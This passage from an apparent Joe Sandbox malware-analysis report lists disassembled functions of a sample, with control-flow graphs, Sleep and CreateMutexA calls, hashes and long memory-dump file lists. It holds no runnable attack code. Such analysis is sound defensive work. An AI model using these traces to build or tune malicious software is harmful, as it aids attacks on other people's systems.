                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 5d47bf655e4f11df75dc39e027ddf70c2e4e2ebc059d4bd5b7d5ea91604cb500
                                                                                                                                                                                                                                          • Instruction ID: c8046bc5d814e4afd3784394a3d1b87a20811dba4cd9a6ffd19f33825ab5531d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d47bf655e4f11df75dc39e027ddf70c2e4e2ebc059d4bd5b7d5ea91604cb500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F3168316241009BEB08DB7CDDCDB6DB7B6EF81314F208619E414A72D5CBB599E08E52
                                                                                                                                                                                                                                          Function 0026A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1062 26a54d-26a56d 1066 26a56f-26a57b 1062->1066 1067 26a59b-26a5b7 1062->1067 1068 26a591-26a598 call 27d663 1066->1068 1069 26a57d-26a58b 1066->1069 1070 26a5e5-26a604 1067->1070 1071 26a5b9-26a5c5 1067->1071 1068->1067 1069->1068 1076 26a944-26a949 call 296c6a 1069->1076 1074 26a606-26a612 1070->1074 1075 26a632-26a916 call 2780c0 1070->1075 1072 26a5c7-26a5d5 1071->1072 1073 26a5db-26a5e2 call 27d663 1071->1073 1072->1073 1072->1076 1073->1070 1080 26a614-26a622 1074->1080 1081 26a628-26a62f call 27d663 1074->1081 1088 26a94e 1076->1088 1089 26a949 call 296c6a 1076->1089 1080->1076 1080->1081 1081->1075 1092 26a953-26a994 Sleep CreateMutexA 1088->1092 1093 26a94e call 296c6a 1088->1093 1089->1088 1096 26a996-26a998 1092->1096 1097 26a9a7-26a9a8 1092->1097 1093->1092 1096->1097 1098 26a99a-26a9a5 1096->1098 1098->1097
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 58a9ed9be6e15fa18966c110ba7e251595781a4a47f6cd0f8d8b7b8f329e5163
                                                                                                                                                                                                                                          • Instruction ID: 53954282a8aa1bb3a619a59030ead1ea17d2f924102ed6e7f3e6be1c6b2394e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58a9ed9be6e15fa18966c110ba7e251595781a4a47f6cd0f8d8b7b8f329e5163
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A314631A241008BEF08DF78DDC9B6DB766EF81314F348619E415AB2D5CB7599E08F12
                                                                                                                                                                                                                                          Function 0026A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1100 26a682-26a6a2 1104 26a6a4-26a6b0 1100->1104 1105 26a6d0-26a6ec 1100->1105 1108 26a6c6-26a6cd call 27d663 1104->1108 1109 26a6b2-26a6c0 1104->1109 1106 26a6ee-26a6fa 1105->1106 1107 26a71a-26a739 1105->1107 1111 26a710-26a717 call 27d663 1106->1111 1112 26a6fc-26a70a 1106->1112 1113 26a767-26a916 call 2780c0 1107->1113 1114 26a73b-26a747 1107->1114 1108->1105 1109->1108 1115 26a949 1109->1115 1111->1107 1112->1111 1112->1115 1120 26a75d-26a764 call 27d663 1114->1120 1121 26a749-26a757 1114->1121 1117 26a94e 1115->1117 1118 26a949 call 296c6a 1115->1118 1124 26a953-26a994 Sleep CreateMutexA 1117->1124 1125 26a94e call 296c6a 1117->1125 1118->1117 1120->1113 1121->1115 1121->1120 1132 26a996-26a998 1124->1132 1133 26a9a7-26a9a8 1124->1133 1125->1124 1132->1133 1134 26a99a-26a9a5 1132->1134 1134->1133
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: efa1ca858cdc56ca1246fa285ec683b1c9596f2933e959e07423e6c7ca24c100
                                                                                                                                                                                                                                          • Instruction ID: ba98d2fd439046cd53641d3cef0b8e79c8bcedc6747b874d327883068d81de53
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efa1ca858cdc56ca1246fa285ec683b1c9596f2933e959e07423e6c7ca24c100
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D314631624201DBEF08DB78DE89B6DF7B6EF81310F288618E414A72D5C77599E08E52
                                                                                                                                                                                                                                          Function 00269ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1136 269adc-269ae8 1137 269afe-269d91 call 27d663 call 277a00 call 265c10 call 268b30 call 278220 call 277a00 call 265c10 call 268b30 call 278220 1136->1137 1138 269aea-269af8 1136->1138 1138->1137 1139 26a917 1138->1139 1141 26a953-26a994 Sleep CreateMutexA 1139->1141 1142 26a917 call 296c6a 1139->1142 1147 26a996-26a998 1141->1147 1148 26a9a7-26a9a8 1141->1148 1142->1141 1147->1148 1150 26a99a-26a9a5 1147->1150 1150->1148
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
